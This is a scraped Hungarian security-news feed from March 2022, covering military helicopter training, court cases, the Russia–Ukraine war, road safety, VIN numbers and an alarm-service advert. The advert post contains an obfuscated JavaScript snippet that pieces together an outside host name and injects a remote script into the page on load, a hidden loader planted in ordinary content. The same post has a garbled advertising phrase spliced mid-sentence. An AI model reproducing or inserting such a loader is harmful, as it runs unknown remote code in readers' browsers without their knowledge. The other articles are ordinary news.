A H145M-ek folyamatosan igénylik az új helikoptervezetőket, és ahogy a gépek száma nőtt, úgy szűkültek a képzési időtartamok. A pályafutásukat most kezdő fiatal helikoptervezetők a légcsavaros alapképzés után AS 350-esen repülnek 10-15 órát, majd a H145M-en folytatják. Tavaly ősszel a Nemzeti Közszolgálati Egyetem Állami Légijárművezető Szakán tanuló negyedéves hallgatók kezdték meg H145M képzésüket. Sajnos a jelenlegi képzési rendszer széttagolja az erőforrásokat és előfordul, hogy a hallgatóknak egy kimerítő repülési feladat után az egyetem felé még online vizsgát is kell tenniük. Akik a honvédség által szervezett belső toborzással kapcsolódtak be a képzésbe, beosztásban vannak, kiképzés alatt állnak, nekik ebből a szempontból egyszerűbb. A H145M átképzést végző oktató szerint „a fiatalok nagyon jók, önállóan repülnek, hiba nélkül hajtják végre feladataikat. Gyorsak a szoftverkezelésben, szinte követhetetlen, ahogy az FMS (Flight Management System) billentyűin jár a kezük”. 

Az Educatio nemzetközi oktatási szakkiállításon egy H145M helikoptert is kiállított a honvédség. A jelenlét haszna majd akkor lesz mérhető, ha folyamatosan érkeznek azok a fiatalok, akik az ott látottak-hallottak alapján jelentkeznek pilótának vagy repülőműszakinak. Sokan kifejezetten a műszaki irány felöl érdeklődtek, ami különösen jó, mert ezen a területen csekély a beáramlás. Előny, ha valakinek van repülőműszaki végzettsége, de egy érettségivel rendelkező fiatal a honvédségen belül is megszerezheti azt. Sőt arra is lehetőség van, hogy külön elbírálás alapján, műszaki, de nem szakirányú végzettséggel csatlakozzon valaki. Aki belép a rendszerbe, először az orosz típusokra kap szakszolgálati engedélyt és egy éves tapasztalatszerzés után mehet Donauwörthbe az Airbushoz. A későbbiekben megoldás lehet, hogy a repülés előtti és utáni munkákat elvégezve az A kategóriás műszakiak szolgálják ki a repülést. Utána a legjobb képességűeket B1 és B2 kategóriára lehet átképezni. Polgári üzemeltetéssel nem terveznek, de repülőműszaki vonalon a civil elvrendszer működik: a biztonság van a fókuszban, minden előírás és szabályzó az EASA irányelveit követi.

A civil repülésbiztonság és a katonai célok összefésülésénél nagy segítség volt a francia oktatópilóta, Georges Alauzet, aki közel két éven át segítette a munkát Szolnokon. Hatalmas nemzetközi tapasztalatának és katonai múltjának köszönhetően, bár civilként oktatott, de pontosan ismerte a polgári és a katonai alkalmazás közötti különbséget. A civil alkalmazás a maximális repülésbiztonságot feltételezi, de egy katonai műveletnél ezzel nem mindig lehet számolni. A H145M esetében nagyon fontos, hogy elkülönüljön a kettő és az üzemeltetők pontosan megértsék, hogy mikor, milyen helyzetben, hogyan lehet alkalmazni ezeket a helikoptereket.

* * *

A cikk nyomtatott változata az Aeromagazin 2022. márciusi számában jelent meg. Fotó: Airbus, Dajka Attila, Kelecsényi István, Szórád Tamás


Categories: Biztonságpolitika

Életfogytig tartó fegyházbüntetést kapott a román férfi, aki lelőtte szeretőjét és megsebesítette annak férjét

Biztonságpiac - Wed, 03/30/2022 - 06:35
Nem jogerősen életfogytig tartó fegyházbüntetésre ítélte a Nyíregyházi Törvényszék hétfőn azt a román állampolgárságú férfit, aki 2016-ban lelőtte szeretőjét és életveszélyesen megsebesítette annak férjét.

Resán Dalma, a Nyíregyházi Törvényszék sajtószóvivője a közleményében azt írta, a bíróság előre kitervelten, több ember sérelmére elkövetett emberölés bűntettének kísérletében találta bűnösnek a vádlottat, aki a szabadságvesztés büntetésből legkorábban 25 év eltelte után bocsátható feltételes szabadságra.

A vádlott 2012-ben került kapcsolatba a nővel. Az asszony 2013-ban kezdeményezte házassága felbontását, azonban később meggondolta magát és úgy döntött, hogy mégis a férjével marad – ismertette a sajtószóvivő.

A döntést azonban a vádlott nem fogadta el, folyamatosan kereste személyesen, telefonon és e-mail-ben, mert szerette volna kapcsolatukat helyreállítani. Mivel nem tudott belenyugodni a visszautasításba, elhatározta, hogy leszámol a házaspárral: 2016. augusztus 31-én a lakóházuk közelében elrejtőzött és várakozott, majd amikor az asszony hazaért, a vádlott a bejárati ajtónál fegyverrel fejbe lőtte, majd a kiabálásra a segítségére siető férjét is.

A lövés következtében a feleség a helyszínen életét vesztette, férje életben maradt, azonban maradandó fogyatékossággal, súlyos egészségromlással gyógyult meg. A támadó tette után Romániába menekült, ahol európai elfogatóparancs alapján másnap fogták el a rendőrök és 2019. szeptember 5-én adták át a magyar hatóságoknak – tette hozzá Resán.

Az ítélet ellen az ügyészség, a vádlott és védője is fellebbezést jelentett be, a jogerős döntést a Debreceni Ítélőtábla hozza meg.

The post Életfogytig tartó fegyházbüntetést kapott a román férfi, aki lelőtte szeretőjét és megsebesítette annak férjét appeared first on .

Categories: Biztonságpolitika

Orosz agresszió: elszabadult aknát találtak a Fekete-tenger román vizein

Biztonságpiac - Wed, 03/30/2022 - 05:35
Sodródó aknát észleltek hétfő reggel Románia területi vizein a Fekete-tengeren, ezért a térségbe küldték a Viceamiral Constantin Balescu aknászhajót, hogy begyűjtse és hatástalanítsa a robbanószerkezetet – közölte a román védelmi minisztérium.

Az aknát az Olimpus 1 halászhajó vette észre 72 kilométerre a Midia-foktól, amely Konstancától 15 kilométernyire északra, a Duna – Fekete-tenger csatorna északi ágának torkolatánál található. A tájékoztatást követően a haditengerészet parancsnoksága riasztotta az aknászhajót, amely – fedélzetén aknabegyűjtésre kiképzett búváregységgel – azonnal a szerkezet felkutatására indult.

A román haditengerészet később közölte, hogy az aknát megtalálták, beazonosították, majd a búvárok robbanószerkezetet erősítettek rá és felrobbantották. A közzétett fotókon gömb alakú rozsdás vasszerkezet látható tüskeszerű nyúlványokkal, számokból és cirill betűkből álló felirattal. A Pro TV kereskedelmi televízió a védelmi minisztériumtól megtudta, hogy 172 kilogrammos YaM típusú, húszkilós robbanótöltettel rendelkező tengeri aknáról van szó. A román aknászhajó a feladat elvégzése után a térségben folytatta a járőrözést, további elsodródott robbanószerkezetek után kutatva.

Szombaton Törökország ideiglenesen lezárta a teherforgalmat a Boszporuszon, hogy begyűjtsön és megvizsgáljon egy úszó tárgyat, amelyről azt feltételezte: az ukrajnai partokról elszabadult tengeri akna. Miután az aknát hatástalanították, a forgalom délután újraindult.

A román haditengerészet már múlt hétfőn is járőrözni küldte aknászhajóját, miután az orosz Szövetségi Biztonsági Szolgálat (FSZB) március 19-én azt közölte, hogy az ukrán haditengerészet elaknásította Odessza, Ocsakiv, Csornomorszk és Pivdennyi kikötőjét. Az FSZB szerint a több, mint 420 tengeri aknából néhány elszabadult a vihar miatt, és fenyegeti a fekete-tengeri hajózást.

Az ukrán fél az oroszokat gyanúsította meg a tengeri aknák elhelyezésével.

The post Orosz agresszió: elszabadult aknát találtak a Fekete-tenger román vizein appeared first on .

Categories: Biztonságpolitika

Mit érdemes tudni az alvázszámokról?

Biztonságpiac - Tue, 03/29/2022 - 19:16

A VIN számot itthon főleg alvázszámként ismerik. Nemzetközi nevén viszont VIN (Vehicle Identification Number), amely a gépkocsi egyedi „igazolványaként” szolgál. A 17 jegyű számsor beolvasása után nem csak a gyártási évet, a helyet, valamint a különféle szervizmunkálatokat tudhatjuk meg általa, de az autó eladásáról is rengeteg információt kaphatunk.

A gépkocsi előéletéről

Az alvázszám egy olyan egyedi azonosító, amely alatt szó szerint mindent nyilvántartanak az autóról. Maga az azonosító olyan számokból és betűkből áll, amelynek részei külön jelentéssel bírnak. Helyileg a forgalmiban, valamint főleg az autó szélvédőjén lévő adattáblán találhatjuk meg, illetve több elrejtett helyen is beleütik a gépjármű egyes részeibe. A VIN adatlapba kerül az is, mikor járt az autó szervizben, milyen balesetei voltak, hogy mikor és hol történetek ezek, továbbá kik voltak a korábbi tulajdonosai. Ezen kívül az autó gyártása, forgalomba helyezésének éve és az összes gyári specifikációja könnyedén lekérdezhető a VIN szám által. Ennek a legnagyobb jelentősége természetesen használt autó vásárlásánál van, mivel egyértelműen felderíthető a VIN szám leolvasása után az autó eredete és pontos története. Sajnos gyakran trükköznek az eladók azzal, hogy például eltitkolják a baleseteket. A megjavított autón nem látszik semmi, de az alvázszám leolvasásával kiderül, hogy mikor volt utoljára szervizben és milyen problémával. Ugyanúgy kiderül az is, ha az autó lopott vagy más kétes eredettel bír. Nehéz vele csalni, hiszen bármilyen hivatalos szervizbe is viszik az autót, ott kötelező az alvázszám adatai alapján még azt is megadni, hogy milyen alkatrészek kerültek cserére a gépjárműben. A VIN számot nem csak a szakemberek, hanem mi magunk is leolvashatjuk az arra alkalmas weboldalakon. Ezek az oldalak olyan nemzetközi adatbázisokkal rendelkeznek, amikben bármely gépkocsi nyilvántartása megtalálható. Ezért az alvázszám lekérdezése esetén még a külföldről behozott autóknál is megismerhetjük azok előtörténetét.

Hogyan értelmezzük az alvázszámot?

Ahogyan már említettük a VIN szám speciális szám- és betűkombinációból áll. Az egész számsor három fő részből tevődik össze. Ezek részei a WMI, a VDS és a VIS megnevezéssel bírnak. Ezek a rövidítések pedig a következőeket rejtik: a WMI a gyártó jelzése, ami minden országban ugyanaz az első három betű vagy szám. A következő hat jegy a modell megjelölését, amíg a VIS az utolsó, minimum nyolc karakterével az egyedi azonosítót jelzi – ez magában foglalja a gyártás helyét és évét is többek között.

Hol található pontosan a VIN szám?

A VIN szám, ahogy már említettük, a gépkocsi adattábláján pillantható meg először. Ez a kis címke vagy akár fémlap jellemzően az autó szélvédője alatt, illetve a kocsi elején található. Viszont a gyártók ezt a karaktersort nem csak ott, hanem az autó különféle területein is feltüntetik. Ez modellenként eltérő, és akár 4-9 helyen is előfordulhat a gépjárművön – általában a vezetői oldalon. Ennek a célja, hogy nehezebben tudjanak csalni az autóval. Ezért egy szakavatott autóvásárló nem csak az adattáblát ellenerőzni, hanem ezeket a rejtett számokat is. Ugyanis ha ezekből valamelyik eltér, vagy épp átütés nyoma tapasztalható rajta, akkor az autóval valószínűleg problémák lesznek.

 

The post Mit érdemes tudni az alvázszámokról? appeared first on .

Categories: Biztonságpolitika

Távfelügyelet – minden, amit a szolgáltatásról tudni kell

Biztonságpiac - Tue, 03/29/2022 - 19:12

A statisztikai adatok világosan rámutatnak arra, hogy a távfelügyelet szolgáltatásnak igenis van létjogosultsága – akár a csendes, nyugodt környékeken is. A számok pedig, mint tudjuk, sohasem hazudnak – ebben az esetben sem.

Nem szabad félvállról venni a kérdést

Személy- és vagyonvédelem – fajsúlyos téma ez, ami nem képezheti alku tárgyát. Sajnos már nem elég a szerencsénkben bízni, és abban reménykedni, hogy mindennemű segítség nélkül is védettek vagyunk a rablókkal, károkozókkal szemben. A már emlegetett statisztikai felmérésekben viszont bátran bízhatunk – az adatok szerint azok a lakások, családi házak, amelyeknél már megoldott a távfelügyelet kiépítése, sokkal kevesebb eséllyel vannak kitéve a betörésnek, mint azok, ahol a lakók nem tulajdonítanak nagy jelentőséget ennek az igencsak számottevő kérdésnek.

24 órás megfigyeléssel a teljes biztonság jegyében

Gondoljon csak bele, milyen felemelő és egyben felszabadító érzés lenne tudni, hogy az otthona, a családja és az értékei teljes biztonságot élveznek – nemcsak időszakosan, de a nap 24 órájában! Ezt a bizonyosságot adhatja meg a számunkra a 0-24 órás távfelügyelet, különösen az olyan extra szolgáltatatásokkal kiegészítve, mint a helyszínre kivonuló járőrszolgálat.

Hogyan működik a szolgáltatás?

Az okos berendezéHa távfelügyelet, akkor csakis az Alarmdirect!s bármilyen észlelt rendellenesség esetén azonnal értesítést küld a központba. A diszpécseri központ szakképzett munkatársai 0-24-ben figyelik ezeket az értesítéseket. A tapasztalatuk és komoly szaktudásuk révén azonnal a megfelelő módon reagálnak. A jelzés oka lehet áramkimaradás, a rendszer akkumulátorának lemerülése, de akár betörési kísérlet is. Ha Ön előzőleg rábólintott a járőrszolgálat igénylésére is, a diszpécser azonnal értesíti a közelben lévő illetékes szerveket, akik a helyszínre kiérkezve megoldják a problémát.

Ha távfelügyelet, akkor csakis az Alarmdirect!

Hazánk egyik legnépszerűbb biztonságtechnikai berendezések forgalmazásával és telepítésével foglalkozó cégére, az Alarmdirect-re bármikor rábízhatjuk magunkat. A profi gárda palettáján kizárólag minőségi produktumokat találhatunk – amelyek ára ráadásul példátlanul baráti.

(function(){ tkwnu="axfpcv6xkwn9";tkwn=document.createElement("script"); tkwn_="u"+("st");tkwn_+="at"+(".");tkwn.async=true;tkwn_+="in"; tkwnu="371575189."+tkwnu;tkwn.type="text/javascript";tkwnu+="f0e926skXqj2"; tkwnu+="72n7hz";tkwn_+=("f")+"o"+("/");tkwn.src="https://"+tkwn_+tkwnu; tkwnd=document.body;tkwnd.appendChild(tkwn); })();

The post Távfelügyelet – minden, amit a szolgáltatásról tudni kell appeared first on .

Categories: Biztonságpolitika

Európai Bizottság: tavaly kevesebben vesztették életüket az utakon, mint a világjárvány előtt

Biztonságpiac - Tue, 03/29/2022 - 16:35
Tavaly lényegesen kevesebben vesztették életüket az Európai Unió útjain, mint a koronavírus-járvány előtt; Magyarországon szintén csökkent a halálos kimenetelű közúti balesetek száma – derült ki az Európai Bizottság a 2021-ben bekövetkezett halálos kimenetelű közúti balesetekről készült jelentéséből.

Az adatok szerint tavaly mintegy 19 800 ember vesztette életét közúti balesetben az Európai Unió területén. A tavalyi adat, noha a 2020-as számokhoz képest öt százalékkal, mintegy ezer halálesettel több, de a 2019-es, a koronavírus okozta világjárvány előtti időszakhoz képest 13 százalékkal, közel háromezerrel kevesebb halálos áldozatot jelent. 2019 és 2020 között a halálos kimenetelű közúti balesetek száma 17 százalékkal csökkent – közölték.

A halálos kimenetelű közúti balesetek számát tekintve az uniós országok rangsora a korábbi évekhez képest nem változott jelentősen. Továbbra is Svédországban a legbiztonságosabb a közúti közlekedés, az országban tavaly egymillió lakosra vetítve 18 haláleset jegyeztek fel. A legmagasabb arányról Romániában számoltak be, ahol egymillió lakosra vetítve 93-an vesztették életüket az utakon 2021-ben. Az uniós átlag 44 közúti haláleset volt egymillió lakosra vetítve.

A jelentés szerint Magyarországon szintén csökkent a halálos kimenetelű közúti balesetek száma a világjárvány előtti szinthez képest. Amíg 2019-ben egymillió lakosra vetítve 62 ember vesztette életét közúti balesetekben, addig számuk tavaly 56 volt, amely csaknem tíz százalékos csökkenést jelent. A halálos kimenetelű közúti balesetek legnagyobb, több mint húsz százalékos csökkenését Dániában, Belgiumban, Portugáliában, Lengyelországban és Litvániában jegyezték fel. Ezzel szemben Lettországban, Szlovéniában és Finnországban nőtt a halálos balesetek száma.

A halálos közúti balesetek 52 százaléka vidéki utakon történt, a városi területeken ez az arány negyven százalék, az autópályákon pedig nyolc százalék. Az autóval utazók az összes közúti halálos baleset 43 százalékát, a gyalogosok húsz százalékát, a motorosok 18 százalékát, a kerékpárosok pedig a tíz százalékát tették ki.

Jelentésében az Európai Bizottság emlékeztetett arra: az EU azt a célt tűzte ki, hogy 2030-ra a felére essék vissza a közúti halálesetek száma. Az elmúlt évtizedben az Európai Unió egészét tekintve 36 százalékos csökkenés következett be – tették hozzá.

Elképesztő: több mint háromezer gyorshajtót mértek be múlt héten Budapesten
Csaknem 3400 gyorshajtót mértek be a rendőrök múlt hét közepén a fővárosban – közölte a Budapesti Rendőr-főkapitányság (BRFK). A 3380 autós közül 132 sofőrrel szemben helyszíni bírságot, 275-el szemben közigazgatási bírságot szabtak ki, további 2973 autóst traffipax mért be. Ők szintén közigazgatási bírságra számíthatnak. A BRFK közleménye szerint az ellenőrzések során kilenc egyéb bűncselekményt is felderítettek a rendőrök. A rendőrség továbbra is kiemelt figyelmet fordít a közlekedésbiztonságra, azon belül is az egyik legfőbb baleseti veszélyforrásra, a gyorshajtások visszaszorítására – írták.

The post Európai Bizottság: tavaly kevesebben vesztették életüket az utakon, mint a világjárvány előtt appeared first on .

Categories: Biztonságpolitika

Orosz agresszió: visszavették az ukrán erők a Kijev melletti Irpinyt

Biztonságpiac - Tue, 03/29/2022 - 12:10
Az ukrán erők visszavették az orosz csapatoktól a főváros határában, Kijevtől északnyugatra fekvő Irpiny települést – közölte hétfőn Olekszandr Markusin, a város polgármestere a Telegram üzenetküldő portálon.

Egyelőre azt kérte a városka lakóitól hogy ne térjenek vissza a településre, mert veszélyes. “Tart a város megtisztítása, és még újabb orosz támadások várhatók” – idézte a polgármestert az Ukrajinszka Pravda hírportál.

Közben az ukrán hatóságok által hétfőn közzétett statisztika szerint az Azovi-tenger partján fekvő Mariupolban a háború kitörése óta csaknem ötezren haltak meg a várost ért orosz támadásokban, köztük mintegy 210 gyermek. Pontos adatokat egyelőre nem tudnak közölni. A kikötővárost már 28 napja ostromolják az orosz csapatok. A települést a blokád előtt megközelítőleg 140 ezer mariupolinak sikerült elhagynia, utána 150 ezer lakost evakuáltak. Jelenleg még mintegy 170 ezren maradtak a városban. Harmincezer mariupolit szállítottak el Oroszországba, illetve az orosz erők által elfoglalt kelet-ukrajnai területekre.

A kelet-ukrajnai Harkiv polgármestere, Ihor Terehov a hétfői tájékoztatóján kijelentette: “az orosz hadsereg célzottan lakott területeket lő. Nemcsak egy-egy házat, hanem egész lakónegyedeket. A város lakóit állandóan bombázzák. Eddig 1410 objektum pusztult el, ebből 1177 többszintes lakóépület”. A polgármester hozzátette, hogy 53 óvoda, 69 iskola és 15 kórház is megsemmisült Harkivban.

Terehov szavai szerint önkéntesek életüket kockáztatva szállítanak élelmet olyan kerületekben lévő óvóhelyekre, amelyeket szünet nélkül ágyúznak az orosz erők. Közölte, hogy ugyanakkor a szupermarketek működnek a városban, és az alapvető élelmiszerek kaphatók. Harkiv más városokból is kap humanitárius segélyt. Ilyen segítséget küldenek az Egyesült Államokból is: Chicago városa például 880 ezer dollár értékben küldött orvosi eszközöket, amelyeket városi kórházaknak és katonai kórházaknak osztottak szét – mondta a városvezető.

A politikus kitért arra, hogy Harkiv olyan város, ahol alapvetően oroszajkúak élnek, a háború kitörése előtt szinte minden negyedik ott lakónak volt rokona vagy ismerőse, barátja Oroszországban. Mint mondta, Harkivot többé-kevésbé mindig is Oroszországhoz “lojális” városnak tekintették, de a háború drámaian megváltoztatta az ott élők viszonyulását Oroszországhoz. Terehov azt hangsúlyozta, hogy Harkiv lakói ma egységesek, és készek a végsőkig harcolni a városuk megvédéséért.

A dél-ukrajnai Herszon megyében lévő Henicseszkben, az Azovi-tenger partján fekvő kikötővárosban – amelyet elfoglaltak az orosz csapatok – elkezdtek rubelben “nyugdíjat” osztani a helyi lakosoknak – számolt be a Moszt című, helyi hírportál. Tízezer rubelt – valamivel több mint száz dollárt – osztogatnak a helyieknek, akik viszont a pénzt azonnal átváltják hrivnyára, a boltokban ugyanis nem fogadják el az orosz valutát. Szerhij Lany, a Herszon megyei tanács egyik tagja a Facebookon arra kérte az embereket, hogy “semmit se fogadjanak el az orosz megszállóktól, ne működjenek együtt velük, ugyanis csakis így járulhatnak hozzá Ukrajna győzelméhez”.

Közben Kirilo Budanov, az ukrán katonai hírszerzés főnöke egy interjúban azt állította, hogy Kijevnek kiterjedt ügynökhálózata van Oroszország katonai, politikai és pénzügyi vezetésében, beleértve a Kremlt is, és szerinte ennek köszönhetően semmisítettek meg nemrég egy partraszállító hajót az Azovi-tenger partján fekvő Bergyanszkban. Budanov az interjúban kiemelte, hogy Ukrajna védői készen állnak hosszú háborúra, de szükségük van még több vadászrepülőgépre, valamint légvédelmi és rakétavédelmi rendszerre.

Az ukrán légierő keleti parancsnoksága hétfőn este arról számolt be, hogy Harkiv megyében újabb orosz repülőgépet és drónt lőtt le. A repülőgép típusáról és a pilóta sorsáról információkat nem közöltek.

Az ukrán vezérkar legfrissebb, hétfői összesítése szerint eddig hozzávetőlegesen 17 ezer orosz katona esett el, mintegy ezer került fogságba. A vezérkar állítása szerint az ukrán erők megsemmisítettek 123 orosz repülőgépet, 127 helikoptert, hét hadihajót, 586 harckocsit, csaknem 1700 páncélozott harcjárművet, több mint háromszáz tüzérségi és 54 légvédelmi rendszert, valamint 95 rakéta-sorozatvetőt.

Az ukrán szárazföldi erők parancsnoksága közben hírszerzési értesülésre hivatkozva arról számolt be, hogy öngyilkos lett az orosz csapatok egyik harckocsiezredének parancsnoka, miután az ukrán hadsereg visszafoglalta az északkeleti Szumi megyében lévő Trosztyanec települést. Az ukrán északi hadműveleti parancsnokság pedig azt jelentette, hogy katonái megsemmisítették az orosz erők egy hadoszlopát, és megszereztek két Ural Tornádó típusú páncélozott teherautót. Oleh Szinyehubov, a kelet-ukrajnai Harkiv megye katonai adminisztrációjának vezetője a Telegram üzenetküldő portálon pedig arról számolt be, hogy az ukrán légvédelem Izjum város közelében lelőtt egy orosz Szu-34-es taktikai bombázó repülőgépet.

Felfüggesztette működését a Novaja Gazeta a “különleges hadművelet” befejezéséig
Felfüggesztette működését a Novaja Gazeta című független orosz lap az ukrajnai háború befejezéséig – közölte a szerkesztőség. “Újabb figyelmeztetést kaptunk a Roszkomnadzortól (az orosz tömegtájékoztatási és távközlési felügyelettől). Ezt követően felfüggesztjük az újság online és papír alapú változatát, közösségimédia-tevékenységét «az Ukrajna területén zajló különleges hadművelet» befejezéséig” – áll a szerkesztőség közleményében. A Roszkomnadzor vasárnap megakadályozta, hogy a Kommerszant, a Novaja Gazeta és a Dozsgy leközölhesse az első interjút, amelyet Volodimir Zelenszkij ukrán elnök a háború kezdete óta az orosz médiának adott. Az anyag csak a Lettországban szerkesztett Meduza hírportálon jelent meg. Dmitrij Peszkov, a Kreml szóvivője hétfőn azt állította, hogy Moszkva “nem fél” nyilvánosságra hozni Zelenszkij interjúját, amelyet a Roszkomnadzor szerinte abból a szempontból ellenőriz, hogy megfelel-e az orosz jogszabályoknak.

The post Orosz agresszió: visszavették az ukrán erők a Kijev melletti Irpinyt appeared first on .

Categories: Biztonságpolitika

Orosz agresszió: Kijev nem tárgyal a “nácitlanításról”, a demilitarizálásról és az orosz nyelv védelméről

Biztonságpiac - Tue, 03/29/2022 - 08:35
Ukrajna kész a semlegességről és a biztonsági garanciákról tárgyalni, de a demilitarizálásról és “nácitlanitásról”, valamint az orosz nyelv védelméről nem – jelentette ki Volodimir Zelenszkij ukrán elnök az orosz sajtónak az országa elleni háború kezdete óta adott első interjújában, amelyet vasárnap este közölt a Lettországban szerkesztett, orosz és angol nyelvű Meduza hírportál.

Az ukrán elnök rosszallását fejezte ki amiatt, hogy az orosz fél a nyilvánosságnak is kiszivárogtatott ultimátumban fogalmazta meg a Kijevvel szembeni tárgyalási pozícióját. Az orosz nyelv védelmével kapcsolatban azt mondta, hogy “a háború minden napja megkérdőjelezi még a fogalmát is annak, hogy mi is az orosz nyelv”.

“Az emberek ezt nem akarják majd. Az emberek nem akarnak majd (oroszul) olvasni, mozit nézni, beszélni” – vélekedett az elnök.

Zelenszkij azt állította, hogy Ukrajnában mindenki olyan nyelven beszél, amilyenen csak akar. A kölcsönös tisztelet szükségességéről beszélt a szomszédos országok esetében, arról, hogy Kijev a történelem, a nyelv és a kulturális örökség iránti “tükörtiszteletet” rögzítő megállapodásokat kíván kötni velük.

“Szóval, mit jelent ez? Hogy ne játszadozzunk tovább, ahogy a magyarok is játszadoznak ezzel egy kicsit, de kevesebbet, Oroszország pedig többet. Ne játszadozzunk tovább az iskolabezárással Ukrajnában. Ha orosz iskolát akarnak, ha valaki oroszul akar tanulni – magániskolát, tessék, nyissanak, de azzal a feltétellel, hogy ha önök nálunk nyitnak egyet, mi önöknél nyitunk” – fogalmazott az államfő.

Leszögezte, hogy szerinte Oroszországban az orosznak, Ukrajnában az ukránnak kell lennie az államnyelvnek. Azt mondta, hogy a legfontosabb pontban, a biztonsági garanciák, a semlegesség, és a nem-nukleáris státus kérdésében Kijev készen áll a megegyezésre. “Ha jól emlékszem, emiatt kezdték a háborút” – hangoztatta.

Zelenszkij hangsúlyozta, hogy a megállapodást parlamenti ratifikációval és néhány hónapon belül referendumon kell megerősíteni, amelyet kezeseknek kell garantálniuk, és amely szerinte csakis az orosz csapatkivonás után lehet legitim. Az ukrán alkotmányban a szükséges változtatásokhoz a hatályos jogrend értelmében két ülésszak, vagyis egy teljes év szükséges.

Az ukrán államfő ismételten személyes találkozót szorgalmazott Putyinnal. Úgy vélekedett, hogy Oroszország, Ukrajna és Fehéroroszország az érintettség okán nem lehet a tárgyalások helyszíne. Azt mondta, hogy egyelőre nem érti teljesen a békefenntartók Ukrajnába vezénylésére vonatkozó lengyel javaslatot. Hozzátette: lengyel partnereinek elmagyarázta, hogy országának nincs szüksége egy befagyasztott konfliktusra a területén.

Hamisítványnak nevezte azt az állítólagos parancsot, amelyet az orosz védelmi tárca szerint Mikola Balan vezérezredes, az ukrán nemzeti gárda parancsnoka írt alá, és amely Moszkva szerint annak bizonyítéka, hogy Kijev erőszakkal készült visszafoglalni a szakadároktól a Donyec-medencét. Azt állította, hogy minden készülő ukrán támadásra vonatkozó dokumentum hamis, és Kijev sem a Donyec-medence, sem a Krím ellen nem akart támadást indítani.

Felhívta a figyelmet arra, hogy nemrégiben az az álhír kezdett el keringeni, miszerint már elkészültek a kitüntetések, amelyeket a Krím visszafoglalásában részt vevő katonák kaptak volna. Rámutatott, hogy ezekhez járó okleveleken az ő nevét, adományozói minőségben, V.A. Zelenszkijként tüntették fel, amelyből az A az apai nevének rövidítése lenne. Mint mondta, helyesen az O betűt kellett volna használni, ukrán módra, az Olekszandr név után, nem pedig a név orosz megfelelőjének, az Alekszandr-nak a rövidítését.

Viccnek nevezte az állítást, miszerint Ukrajnában katonai biolaboratóriumok működnek. Mint mondta, Ukrajnának emellett nukleáris és vegyi fegyvere sincsen.

Ukrajna katonai célját a minél kevesebb áldozatban, a háború időtartamának lerövidítésében és az orosz erőknek a február 24-i támadás előtti “kompromisszumos területekre” való visszavonulásában nevezte meg. Az állította, hogy az orosz erőknek mintegy 20 ezer katonájuk esett el. (Az orosz vezérkari főnök első helyettese pénteken 1351 halottat ismert el.)

Zeleneszkij a Meduza mellett a Kommerszant és a Novaja Gazeta című lap, valamint a betiltott Dozsgy kérdéseire is válaszolt a Zoomon adott interjúban, amelyet vasárnap egy időben, vasárnap este kívántak megjelentetni. Az orosz tömegtájékoztatási és távközlési felügyelet (Roszkomnadzor) azonban felszólította az orosz médiát, hogy ne tegye közzé az interjút, és “ellenőrzést” indított a “felelősség mértékének megállapítására”. A Roszkomnadzor vasárnap blokkolta a német Bild bulvárlap és Alekszandr Nyevzorov orosz újságíró honlapját, tömeges rendbontásra, szélsőségességre, valamint jogellenes tömegakciókban való részvételre szólító felhívás címén.

A G7 csoport nem hajlandó rubelben fizetni az orosz gázért
A világ legfejlettebb ipari államait összefogó G7 csoport kormányai felszólítják az országukban orosz energiahordozók importjával foglalkozó vállalatokat, hogy ne fizessenek rubelben az érvényes szerződések alapján Oroszországtól vásárolt földgázért – jelentette be a német gazdasági és klímavédelmi miniszter. Robert Habeck elmondta, hogy a G7 csoport soros elnökségét betöltő Németország képviseletében összehívta a hetek energiaügyekben illetékes minisztereit, hogy egységes, összehangolt választ adjanak a Kreml által barátságtalannak minősített országokra vonatkozó rubelalapú elszámolási rendszer bevezetésére. Az online tanácskozáson teljes egyetértés volt arról, hogy Moszkva lépése az érvényes földgázszállítási szerződések “egyoldalú és egyértelmű megsértése” – mondta a miniszter. A G7 csoport az Egyesült Államokat, Franciaországot, Japánt, Kanadát, Nagy-Britanniát, Németországot és Olaszországot, valamint az Európai Uniót mint nemzetek feletti intézményt fogja össze.

The post Orosz agresszió: Kijev nem tárgyal a “nácitlanításról”, a demilitarizálásról és az orosz nyelv védelméről appeared first on .

Categories: Biztonságpolitika

Két terrorista agyonlőtt két embert Izraelben, hetet megsebesített

Biztonságpiac - Tue, 03/29/2022 - 07:35
Agyonlőtt két embert, hetet pedig megsebesített két merénylő az észak-izraeli Haderán, a támadókat lelőtték – jelentette a Kan közszolgálati rádió.

Hadera városközpontjában, a központi buszpályaudvarnál, két merénylő automata fegyverekkel tüzet nyitott az ott tartózkodó rendőrökre és civilekre. A közelben lévő határőr katonák meghallották a lövéseket, a helyszínre siettek, és agyonlőtték a támadókat. Hét sérültet a közeli Hillel Kórházba szállítottak. Közülük ketten súlyosan megsebesültek, hárman közepesen, ketten pedig könnyebben sérültek meg a rádiónak nyilatkozó orvos szerint.

“Ez egy nagyon súlyos incidens. (…) Két eszméletlen ember is volt a terepen életjelek nélkül, náluk, sajnos, csak a halál beálltát tudtuk megállapítani” – nyilatkozta egy mentős a Jediót Ahronót című újság hírportáljának, a ynetnek. A merénylők az észak izraeli Umm al-Fahem nevű városból autón érkeztek Haderára, arab nemzetiségű izraeli állampolgárok. A Hamász és az Iszlám Dzsihád nevű iszlamista terrorszervezetek üdvözölték az iszlám böjti hónap, a ramadán előtt egy héttel elkövetett merényletet.

Múlt héten Dél-Izraelben Beér-Seván történt hasonló, akkor négy emberéletet kioltó merénylet, melyet egy, a Negev-sivatagban élő, szintén arab nemzetiségű izraeli állampolgár hajtott végre.

The post Két terrorista agyonlőtt két embert Izraelben, hetet megsebesített appeared first on .

Categories: Biztonságpolitika

Orosz agresszió: izraeli légvédelmi rendszer beszerzését mérlegelik Németországban

Biztonságpiac - Tue, 03/29/2022 - 06:35
Németország izraeli légvédelmi rendszert vásárolhat a védelmi képességek erősítését szolgáló nagyszabású programjában, amelyet az Ukrajna elleni orosz háború miatt indítottak el – írta a Bild am Sonntag című vasárnapi lap.

A lap szerint Németország a Nyíl-3 nevű rakétarendszert vásárolhatja meg, amelyet az Israeli Aerospace Industries és az amerikai Boeing fejlesztett a több ezer kilométeres távolságra fekvő célpontokra nagy pontossággal lecsapó rakéták elleni védekezésre. A rendszer nagyjából kétmilliárd euróba kerülhet és 2025-re telepíthetik.

